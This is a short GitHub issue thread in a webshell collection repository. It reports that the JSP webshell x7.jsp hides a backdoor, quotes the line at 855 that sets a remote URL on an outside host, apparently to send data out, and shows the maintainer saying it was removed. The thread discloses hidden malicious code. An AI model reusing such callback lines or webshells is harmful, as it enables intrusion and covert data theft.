### ISSUE TITLE
jsp/x7.jsp backdoor

### ISSUE THREAD

**Issue by limpoxe** [tennc/webshell#31]
Line855:

uc(dx()) = "http://adgoog.gicp.net/index.asp?ct="

**Comment by CyberTheReape** [comment]
@limpoxe Did they hide backdoor in line 855? Is there a backdoor in this script?

**Comment by tennc** [comment]
@limpoxe  del  this backdoor 

https://github.com/tennc/webshell/commit/77f6e319d7795790ec640ef92d6619b5f31a51f4
